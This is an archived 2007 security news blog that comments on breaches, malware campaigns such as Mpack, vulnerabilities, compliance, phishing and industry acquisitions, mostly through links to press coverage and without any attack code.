Wednesday, June 27, 2007

Keeping Kids Safe Online

Information Week ran two articles this week about online safety for kids at school and on MySpace.

They referenced two good reports from Webroot and from the Pew Internet project.

Triple Header for Laptop Thefts

The SANS NewsBites newsletter reported yesterday on three laptop thefts with significant data breaches:

The State of Ohio, Prince Charles and Texas First Bank were the winners in the drawing.

Guard those laptops.

Security Geeks on Crack

This is a humorous but to-the-point post by Michael Farnum on his Computer World blog. He said security professionals need to stop worshipping gadgets and focus on the business side over the technical side of security.

He quoted Rational Security, a fascinating blog covering the philosophical side of IT security, among other things. It's a real meaty, in-depth and thought-provoking blog that I highly recommend.

Farnum wrote more about the matter in a prior blog post.

Tuesday, June 26, 2007

A Buffer Overflow in Java?

Who said Java had no buffer overflows? I have, for one. I've qualified that by also saying Java itself checks buffers but can still pass along an overflow to a susceptible back end system in C or Assembler.

Here's a Secunia advisory about a buffer overflow in the JDK, a bit different, but worth noting nonetheless.

PCI at the Gas Pump

This is scary for anyone who drives a car and fills up their gas tank, which, I guess, is everybody.

A Gartner report cited by Computer World says the point-of-sale (POS) devices at most pumps stores credit card data that could be easily filched by a hacker. It said there's enough data, and it's sent over insecure wireless networks and the Internet, to create duplicate cards. Companies are using the Internet for the POS devices instead of dial-up networks.

Further, the wireless connections use Wired Equivalent Privacy (WEP), which is a weak form of encryption.

More on Mpack and Porn Sites

It seems the Mpack attack, responsible for the Italian Job exploit last week, is now infecting porn sites.

This article in Computer World cites security experts who say most of the vulnerable web servers were running Apache.

Although the number of infected porn sites is less than the 10,000 sites hacked in the Italian Job, more users have been infected.

Saturday, June 23, 2007

Pirillo's Wireless Security Video

This is a real nice video from Chris Pirillo about securing your wireless network. He suggests using MAC address filtering. It's not long, only a few minutes, and can be embedded in your blog, like this:

http://live.pirillo.com/ / http://chris.pirillo.com/media/

New Group of ATE Questions Posted

I just noticed that SearchSecurity posted my next group of five Ask The Expert questions on identity and access management:

What challenges arise when designing a logging mechanism for peer-to-peer networks?
This question posed on 30 May 2007

What are the potential risks of giving remote access to a third-party service provider?
This question posed on 20 May 2007

Should void user IDs be preserved in an audit history?
This question posed on 15 May 2007

What are the best security practices for securing sensitive data on PDAs?
This question posed on 11 May 2007

Is there any policy or regulation to help protect biometric data?
This question posed on 02 May 2007

US Government Security Full of Holes

The US government took it on the chin this week after a House panel slammed DHS CIO Scott Charbo for the agency's IT security record.

In his Security Strategies newsletter on Network World's site, Prof. Mich Kabay has been running a series about the VA incident last year and its aftermath.

Kabay cited a report by the Committee on Oversight and Government Reform giving federal agencies low marks in IT security.

Wednesday, June 20, 2007

Security Awareness Videos

Here's some nice security awareness videos posted to the Yahoo Security Awareness group.

This is a collection of videos from the office of the CIO of British Columbia.

The following were posted by Scott Pinzon of WatchGuard Technologies:

How Password Crackers Work

Spyware: Think Before You Click

Malware Analysis: Rootkits, Part 1

Malware Analysis: Rootkits, Part 2

Malware Analysis: Rootkits, Part 3

Microsoft also a series of videos on home computer security.

List of Recent Security Company Acquisitions

After SPI Dynamics announced its acquisition yesterday by HP, the Associated Press had an interesting story about the recent wave of security company mergers.

The AP article said standalone security companies were basically all on the block for sale and disappearing rapidly. They said security was fast becoming a standard part of tech companies, who were gobbling up what they could in the security market.

Computer World also summarized the AP story in this blog post.

42 HIPAA Audit Points

This is a nice checklist from Computer World of 42 points a HIPAA auditor might look for.

Even though HIPAA -- the Health Insurance Portability and Accountability Act -- applies to health care institutions and companies, the confidential customer data they're supposed to protect is all the same.

Finance or health, they all have our data, and they all need to protect it.

Tuesday, June 19, 2007

The Italian Job Hack

As someone who speaks Italian, I frequent Italian web sites as one way to practice the language, and, as a result, find the recent Italian Job hack personally troubling.

The hack got its name from Trend Micro, which reported it yesterday. There are screen shots of an affected site with a sample of the malicious code embedded in an IFRAME tag.

The attack started from a network of at least 10,000 hacked web sites based in Europe. Visitors to the sites were redirected to servers hosting Mpack, a malware kit developed by Russian hackers. Mpack loads keystroke logging software that scouts the user's computer for user IDs and passwords for online banking web sites.

Details about Mpack can be found on Symantec's web site with more specific information about the Italian attack posted there, as well. Websense also issued an alert.

Ryan Naraine's Zero Day blog has more background information about the exploit.

What's interesting is that the root cause are compromised web servers at one of Italy's biggest ISPs. But no one has explained how those servers were compromised in the first place. If those servers hadn't been compromised, this attack would have been thwarted.

This story was also reported in Computer World and eWeek.

I returned last month from a two-week trip to Italy.

Wireless Security Tips

This article in the Windows Secrets newsletter by Scott Dunn has some good tips about wireless security at public hot spots.

Though a year old, Kim Komando also has a guide on wireless security, which I'd say is still current.

HP Acquiring SPI Dynamics

SearchSecurity reported today that HP is buying SPI Dynamics, the creator of the WebInspect web scanning tool. WebInspect is a top-of-the-line product for developers to find security holes in their web sites.

SPI Dynamics has both a web site and blog with information on exploits against web sites.

Sunday, June 17, 2007

BugHunter v2.2c Just Released

BugHunter, a free malware removal tool, just released it's latest version, 2.2c this week.

It's available for download from the BugHunger web site.

A quick glance at the list of malware it blocks shows an impressive list of spyware, Trojans and other general nasties. Here's a list of new malware just added in the latest release on June 13.

As you can see from this screenshot, it's pretty basic and easy to use:


Friday, June 15, 2007

Yahoo Mail XSS Vulnerability

Here are some details about a XSS vulnerability in Yahoo Mail on the Net Cookies blog.

The posting has two sets of code, one to be hosted on a web server and the other, a Ruby script, for generating links to the Yahoo vulnerability. The attacker then runs the address of the hosted code through the Ruby script.

This isn't rocket science. It's a textbook XSS exploit, where XSS is used to steal a cookie, send it to the hacker's server, where it's used to hack the victim's session.

The post has a lot of detail not only about the exploit but about the apathy of the developer community toward XSS despite how rampant a problem it is.

It's that easy.

Consumer Devices and Network Security

This is a nice summary from Information Week of the various security issues around consumer devices (blogs, IM and MP3 players) used by employees at their companies.

This isn't news -- these household toys make a joke out of perimeter security -- but the article covers all the major concerns surrounding the issue.

It also argues for better Network Access Control (NAC), a controversial issue itself right now. But that'll be for another post.

Thursday, June 14, 2007

Denial of Service Attacks Aren't Worth It Anymore

This is an interesting item from Symantec analyzing why Denial of Service (DoS) attacks aren't worthwhile anymore.

Basically, Symantec is saying that most DoS attacks come from botnets. If the bot herder isn't careful, a prolonged DoS attack can expose the bot controller. Once the controller is found, it can be taken down. The result: a DoS attack can lead to the bot herder losing the entire bot.

Legitimate Sites Hidding Child Porn

This is scary. The anti-virus vendor Sophos reported that cybercriminals are using legitimate sites to inject malware with links to child pornography sites.

This was reported yesterday in Information Week.

FBI Arrests Bot Herders

The FBI announced yesterday that it had arrested or charged three alleged bot herders. The three were caught under the FBI's Operation Bot Roast, a national operation that uncovered over one millions victimized IP addresses.

One of the three was caught by the FBI office here in Chicago, according to their press release.

Details about the bot herders were reported today in Computer World. More information about the operation itself was in another Computer World article, also today.

Wednesday, June 13, 2007

PCI Compliance Blog

I ran across this blog devoted entirely to Payment Card Industry (PCI) compliance. To any one going through this maze, this blog has some nice tips.

I've written two articles for SearchSecurity on PCI, one in March, the other in May.

CSO Article on Web Application Security

CSO magazine ran an article about what it called the "murky world" of web application security.

It talked about some of the issues surrounding web application testing and ethical hacking.

Acunetix Releases WVS v5

Acunetix announced this week that it released Web Vulnerability Scanner v5. It said the new tool will help companies be compliant with the Payment Card Industry (PCI) standard.

This was also reported on Lockergnome.

Acunetix has an online Web Site Security Center.

Comodo Rated Best Personal Firewall

Lockergnome in a recent review, cited Comodo as the best personal firewall.

There's also a link on my personal site. Click on Firewalls in the left hand navigation bar.

Privacy International Slams Google and Others

In its 2007 Interim Rankings, Privacy International gave Google a "Hostile to Privacy" ranking.

The six-page report wasn't particularly favorable to most large Internet service companies, giving only a handful the ranking of "Generally Privacy Aware." Even this ranking would be considered a "B," since no one got the highly coveted "Privacy-Friendly" ranking, the "A" on their report card.

The report cited Google for collecting sensitive data about customer's searches, storing the data for up to 24 months, having a deceptive privacy policy and for being evasive about customer complaints.

Privacy International is a human rights group dedicated to fighting abuses of privacy and surveillance by governments and corporations. Its work is mostly in the high-tech side of these issues.

Even though Google got thrashed, nobody really comes off clean in this report.

Shame on everybody.

Monday, June 11, 2007

Compliance Doesn't Equal Security

This is a great blog post by Computer World's Michael Farnum about how compliance doesn't equal security. I agree with him one hundred percent.

Too many companies are bending and bowing to auditors and regulators at the expense of implementing true security controls. They do what they're told -- or forced to do -- rather than what makes information security sense.

Farnum says there's no substitute for good old-fashioned best security practices and following frameworks like COBIT and the ISO standards. Following these practices will automatically a company compliant.

Securing Your Mac

Here's a nice article from Information Week with tips on securing your Mac.

I've written some other posts about Mac security.

My SearchSMB Article on Laptop Security

My article on laptop security came out today on SearchSMB. The article is mostly about physical and administrative security. It talks, for example, about protecting laptops from theft and, if they're stolen, how to protecting the data on them.

Here's another recent article from Enterprise Security Today, which expands on the subject. It covers some items I didn't touch in my brief piece. Their article talks about how many corporate laptop users are reckless and engage in risk behavior with their laptops, both online and otherwise.

Sunday, June 10, 2007

April Ask The Expert Questions Posted

My ATE questions on SearchSecurity from April were just posted, and here they are:

Is the use of digital certificates with passwords considered two-factor authentication?
This question posed on 30 April 2007

How to test an enterprise single sign-on login
This question posed on 23 April 2007

What's the best way to verify client authentication across unrelated Web servers?
This question posed on 16 April 2007

Creating a personal digital certificate
This question posed on 11 April 2007

Is there an identity management software product for audit and analysis?
This question posed on 02 April 2007

Microsoft MVP Demonstrates WEP Break-In

At TechEd 2007 last week in Orlando, Microsoft MVP Marcus Murray demonstrated how to break into a wireless network secured by WEP.

He once again showed how easy it is to crack WEP.

A group of German researchers made headlines in April when they cracked WEP in a matter of minutes.

Thursday, June 07, 2007

Yahoo Messenger Vulnerabilities

The CIMIP Identity Theft Research Center

This is a nice piece in Prof. Mich Kabay's Network World column about the Center for Identity Management and Information Protection (CIMIP) at Utica College.

There's lots of good information about research into identity theft.

Keeping Organized Crime Out of Your Network

This is an interesting article on the IT Security web site about keeping your network crime free.

It's interesting because it really is just a nice concise summary of routine security procedures. So what's so special about organized crime? How does it differ from any other network intrusion? It doesn't. They're all the same but can still be both prevented, if you follow the steps in the article.

Cyberwarfare in Perspective

Cyberwarfare isn't what it's cracked up to be. In this Information Week blog post yesterday, Patricia Keefe makes some interesting points and puts it in perspective.

Terrorists are like spoiled children looking for attention. They're also pyromaniacs. They like bonfires and burning buildings (think 9/11). Burning things attract far more attention and are so much more macho than some wimpy network slowdown.

Keefe asked if the recent cyberattack on Estonia really caught people's attention. She said it really didn't.

That doesn't mean that cyberattacks against our infrastructure won't happen, or aren't serious. But Keefe makes the point that businesses, who are the main target, should take the old-fashioned approach -- beef up their disaster recovery and business continuity planning.

Being prepared is what makes the most sense, not fretting over what might or might not happen.

Wednesday, June 06, 2007

Security Cameras and Paraphenalia

I get a lot of unsolicited mail from security companies, but this one tops them all.

I got a catalog today from Super Circuits, who sells a whole array of security cameras. They include cameras hidden in clocks and hats, among other things.

I have to wonder if this stuff is legal for civilians and those not in law enforcement.

FFIEC Guidelines and Passwords

The Federal Financial Institutions Examination Council (FFIEC) issued a guideline in 2005 recommending that banks offer two-factor authentication for all their online customers. They said user IDs and passwords, by themselves, were insufficient and could be easily cracked.

According to CSO, many banks still aren't compliant. In their Alarmed column, Sarah Scalet called three banks to inquire about their authentication policies and practices and got some interesting responses.

They also reported more bad news about passwords.

The Acquisition March Keeps On Going

Acquisitions of security vendors continued apace with the announcement this week of RSA's purchase of Verid, IBM's purchase of Watchfire, and more speculation all around of who's next.

Some More Google Stuff

Computer World reported yesterday that Microsoft IIS web servers were more prone to hosting malicious code. The results were in a blog posting by Nagendra Modadugu of Google's Anti-Malware Team.

But if you take a closer look at his results, Apache also hosts its share of malware. It would be more accurate to say the results are dependent on geography, meaning where the server is located. In Russia and Germany, Apache was a bigger culprit, while in Asia IIS was the bad guy.

Modadugu speculated that the culprit in Asia was pirated software -- bootleg IIS copies that weren't patched and that, of course, couldn't use Microsoft's automatic update feature to stay clean.

In another unrelated report, a flaw was found in Google Desktop similar to the Firefox exploit uncovered a day earlier.

My Compliance Counselor Article on SearchSecurity

My article on best practices for compliance during a merger came out today in SearchSecurity's Compliance Counselor newsletter.

I described some best practices for how two companies during a merger, at different stages of the compliance process, can reach the same level of compliance.

Cybercriminals Hide Behind Anti-Forensics

This is a scary article in CIO magazine about how cybercriminals are using anti-forensics to hide their tracks.

Anti-forensics is using tools that defeat forensics analysis. The point is not just to intrude but to hide your tracks.

Tuesday, June 05, 2007

Spam Unabated Despite Arrest

The spam just keeps on coming, despite the arrest of an alleged spam king last week. Here's why.

A recent MessageLabs report said "spam spikes" against individual domains was on the upswing. It said this continued a trend toward targeted attacks.

Large companies were also a source of spam, according to this report.

Latest Ask The Expert Questions on SearchSecurity

Search Engine Security

Information Week reported this week about Google's purchase of GreenBorder Technologies, an anti-virus vendor. The article speculated that Google is moving into the enterprise security area.

In a related development, McAfee also released its State of Search Engine Safety report this week. Among the results are that music and technology sites posed the highest risk of hosting spyware or other malicious code.

Two New NIST Publications

Sunday, June 03, 2007

New Mac and Firefox Vulnerabilities

The Mac came under attack again this week for a vulnerability in Samba file sharing and a buffer overflow, all part of a total of 17 flaws patched this week.

But eWeek's David Morgenstern came to the venerable old Mac's defense in this column.

Firefox, another favorite of the security community, also came under scrutiny for vulnerabilities to its add-ons and through Google Desktop.

Cyberwarfare Gets Nasty

Two reports about cyberwarfare, one about China and the other about Estonia, came out this week.

Computer World and PC World had articles about Chinese building up their cyberwarfare capability and are actually writing attack viruses. The articles cited a Pentagon report assessing Chinese military strengths.

The Economist report on attacks on Estonian web sites, supposedly by Russian hackers, which was denied in another story in Network World.

Information Week had an interesting piece on both attacks and the overall impact of cyberwarfare.

Tool to Protect Privacy

This is a web site offering a service to supposedly clean up your reputation from malicious web postings.

ReputationDefender was mentioned in Prof. Mich Kabay's recent Security Strategies newsletter.

Article on Web 2.0 Security

PC World ran an article in its July issue about Web 2.0 security.

Expect more on this as more applications and services migrate to the web. The possibility now exists for things like XSS to break into critical systems and databases. Before, when these systems weren't web-based applications, they weren't susceptible to web attacks.

Not, they are.

Interesting Cyberscams

This is an interesting story about a "one-cent" scam where fraudsters pinged for active accounts on the automated clearinghouse system. The crooks then deposited a penny and then authorized withdrawals.

In another case, cyberthieves dropped Trojans on computers in the offices of the city of Carson, California, and made off with close to a half million dollars.

Both incidents are still under investigation.

More on Wireless and Mobile Threats

Security of wireless and mobile devices isn't anything new. It's been talked about a lot over the last few years. But here's article in Computer World about five reasons it could get worse.

Here's another article on MSN about how wireless exploits may have been part of the recent highly-publicized TJX breach.

This is how an Oregon hospital faced the issue head on.

Image Spam Article

Here's an in-depth piece in CSO magazine about image spam.

Embedding spam into images has been a favorite tactic recently of spammers trying to avoid filtering software. Most spam filters are looking for keywords, not images, allowing an e-mail message consisting of only an image to pass through. The filter can't tell the image is a picture of a spam message.

A "Safe" Domain for Banks and More on Phishing

Now here's an interesting concept, a new domain specifically for banks. The domain would be ".safe" and would supposedly protect customers from phishing sites.

The domain would supposedly be locked down to keep non-bankers from registering domains. An interesting concept in theory, but I'm not how it would actually prevent someone from trying to fraudulently pose as a bank to register a bogus URL with the .safe domain.

This proposals follows on a report by the Anti-Phishing Working Group saying the number of phishing sites has skyrocketed in April.

Dell was hit by a phishing attack that was reported on on PC Magazine's web site and by AusCERT, the Australian branch of CERT.

This is an article in Computer World about a new specification for DomainKeys Identified Mail (DKIM) to fight phishing.

Thoughts on Google Security

The IT Security web site had an interesting post last month about Google security.

There was also a comparison of Google and Microsoft security in a slide show comparing the two companies on eWeek.

There were two other articles in eWeek, one about people clicking on anything, including an ad that claims to infect their PCs with a virus, and Google's response. The article reports on a study from Google about the dangers of drive-by downloads of malicious code planted on seemingly innocuous web sites.

This really isn't news and has been a growing problem recently. But the Google study goes into quite a bit of depth and is pretty comprehensive.The story was also reported in Techworld.

This is just some food for thought as Google grows into new areas and faces new security challenges and issues. Some of these, to be sure, weren't expected when the company started out solely as a search engine.

Arrested for Accessing Free Wi-Fi

A man in Michigan was arrested for accessing free wi-fi service from his car. The service was being offered by a local cafe, but the man wanted to access it from the comfort of his car, which he apparently did often.

But, under Michigan law, since he didn't get permission from the cafe to use their service, he was legally liable.

The story was reported on the ars technica web site and WOOD TV in Grand Rapids, Michigan.

Study About Internet Censorship

The OpenNet Initiative released a report recently, saying that at least 25 countries censor Internet usage.

The story was reported in May in My Way News and the BBC. I also had a post last November on privacy and Internet censorship.

More results of the study will be published in a book from MIT Press, Access Denied, scheduled for release in November.

Saturday, June 02, 2007

Article on Web Security Testing

There was a nice article on web security testing tools on SearchSoftwareQuality by Kevin Beaver.

It mentioned an interesting tool, Absinthe, for data recovery for SQL injection.

IronPort Revamps SenderBase Site

IronPort revamped its SenderBase web site recently to be a comprehensive portal of virus, e-mail, spam and other web-based threats.

It's a nice site worth taking a look at.

This was reported in an eWeek article.

MySpace Getting Tough on Sex Offenders

MySpace has offered to provide data on sex offenders to the authorities, according to these recent articles in The Denver Post and The New York Times.

MySpace has a web page devoted to security, and there's an independent blog, MyCrimeSpace, which tracks malicious activity on the site.

Social networking sites, in general, have been the focus of security concerns, not just on the privacy front but also for, at times, hosting malicious code.

The privacy issue revolves around posters who put personal information, or information that could be used to stalk someone, on their profile.

New Web Site on Information Security Standards

A new web site, InfoSecMinds, was launched last month about information security standards and management best practices.

It looks interesting and might be worth following.

Ubuntu Security Resource

The IT Security web site, an outstanding resource in its own right, had a nice article about Ubuntu Linux security. Ubuntu is the hottest Linux distro these days, and this piece focuses specifically on Ubuntu security.

I wrote an article for SearchSMB last year about Linux security. It was much more general and only scratched the surface of this complex topic.

WindowsSecrets Guide to Home Computer Security

WindowsSecrets, a weekly newsletter for home users about -- you guessed it -- Windows, recently published a blurb about security for home computers.

They listed three essential points, which are detailed in the article:
  1. Hardware firewall
  2. Security suite
  3. Update management
It's a bit simplistic, but I can't argue with their main points.

Some of you may remember the outstanding Langa List. Well, Langa merged his list and reincarnated it as WindowsSecrets.

IM Security for SMBs

I just got back a few days ago from my trip to Italy and am just starting to catch up.

I saw this week that SearchSMB ran my article on IM security best practices for SMBs.

To view the article, you'll need to register with SearchSMB. It's worthwhile, since they have articles about all kinds of topics of interest to SMBs, not just about security.

SearchSMB is part of the TechTarget group of web publications, which includes SearchSecurity, another site I write for.